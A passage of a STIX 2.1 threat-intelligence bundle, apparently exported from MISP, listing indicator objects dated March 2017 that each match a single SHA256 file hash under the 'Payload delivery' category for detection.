|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ba-c304-4278-9274-47ed950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '5994178fd21ef4fbcea34a27890e24d56e5ebd247d26b4219f4d5475e4e00a9c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69bb-60a8-4feb-bf32-4b73950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b2484daed920e8065605675822eb3b0e66d947f024dbc8193f39988a6e37afd9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69bc-4664-4b60-90bc-4446950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '4f7a58f1809fd0685ec815d0f5c910d39ef27ed2c4576339b3477a44aa756bad']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69bd-052c-41d3-aae9-4290950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '86debb3398b60748c2c1d0d88694c7308f2017c6737490e84fe688396a0c5aa4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69be-92a8-43a4-800d-42bd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f2693ac1f73aa32dc4682ca66918e3ed78ed490cabc942018a6eca8c4aed9630']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69bf-eb1c-435c-92fa-4cc9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '810e765fc4b9f838ed619a777528b243573d79e93ab29d8e1e3071ea2619fe0f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c0-a72c-4196-822c-4abb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '18241e18bdb290aa026d87c6d3dfa780d76347e8e966f3956bdfe44f36325473']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c1-e834-4110-92a7-403f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c88771c9a6adc3c8bd6bd2d173c82f0e1c1a5966cbb2f05c5471b978840c2223']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c2-72f4-4147-b8cf-44f9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '5f2e9aa038862b16ab09e6960262a25993e715df786a339bea352411e5e8ab12']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c3-ec6c-4ed9-8264-45c7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f0b5592de97e7e7193b76e073ee21b090884f503c85258ab0cc1d780ae4e41c4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c4-be24-421b-be02-4f32950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f22ed39d51c61cae0e03b2be39e05d1bfef05e55320aace141332a4a8ed3bd2c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c5-9244-4baa-8c79-4d98950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'de77795f1344857af0b583e38939f1cbf789b0989b6c8dca4e8ea3a6f0e646a1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c6-008c-44f5-9d8b-47f7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '60c2d4a1a5f757f5c9d3686bf85a5529e040049723ca3988e1f9560ea93a386d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c7-4db8-43c0-9445-462d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3c0f463ac70d2f2415fbdb0446ba0fad290fd93b3db9708ffc4a4bdca0b5d4f7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c8-abe0-42ae-8323-4668950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '9bb12887255696617d3e6356fe9f343473f6805db7dfabc6585a2ecd3289bff7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69c9-ea78-4d06-9105-47ef950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '2829d72b813345348681d402184d53ec74fa491a0f3c726aae6c39b901fac1e9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ca-5bac-4c6e-8895-4d03950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd95990b7b03d017a64b8aa9f6133416176902d4195af9917660088245f4ebe7a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69cb-dacc-43f1-96ab-4509950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e267f9233c885d662804197e153e69cb2f7704f14b5d082dce7fe3c2d581d4df']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69cc-4cb8-4d3c-8678-484e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6886aa1e2760b874a4950cac08e76259ff476a1976a0aeca4d392f60eefca6cc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69ce-2568-4665-aedf-4823950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '1773b425ac6c670cabfdfa300c0b0c2724bd0585b87218c3119af39c170d3074']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69cf-e7cc-4978-8e8f-447b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '12558c50b9b61d080aac7b0890f1b95142316ae0d4e78dfb98672571543ecf6e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d0-c930-4ad4-b12b-4efb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '05789b1487fa274943d967834ad530bc89d94aeed8c240f96d9922f05d6fb101']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d1-d34c-4e37-98d9-4fc5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'a797aff0ed250f1fffbc6a718796b63907a94ac21d6bb712a5e7786670a9d1fe']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d2-c330-42a5-80bd-4c0a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f842607898e226fb480979112b0d67e3266ed7abf55f854851db0686ef5e4987']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d3-99a4-43c5-af9b-4747950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '5584a83d69a01b2a3402c21f78284f6de8ac0a7e5dd5b25b6b9b59eb95f4eeaf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d4-5e48-4460-92c7-4aaf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '86c2d111086dba6c114ed114b1392183c2be4283b1702d5970601d7a29201178']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d5-4048-469f-9eca-4e8d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '1583319eb9266680c0cdc81937c76242306f365b767abe4f85322bace65f9d3c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d6-b5d4-4780-b8e0-4f4f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '949ad75ea9292d2d85498dc3a9ee033d736e40deba1a19a44419d91cee218a58']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d7-5b14-4404-a887-4e8e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '9011510e459b324b98b45284fba36d92c3dcafb2c9dc7a8a29256b3439a1c526']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d8-b7cc-4c18-b88a-41e4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'de6134aec7b39d8f90dcaf1da03ad50ecbc8b48a6e62b6a67d0cec68e9968267']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69d9-7a88-47e7-a192-4ab0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c373ad48e60fb8a396a80927546e9898760422447981238d91679e6ee8a09d6d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69da-2b04-4df8-b3f8-4c5d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '2663d24e63d15e6f247039f7d0fb51958eddb5ad7043a2d305e24f8db6477271']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db69db-4dd0-4a9e-89b9-407d950d210f",
|
|
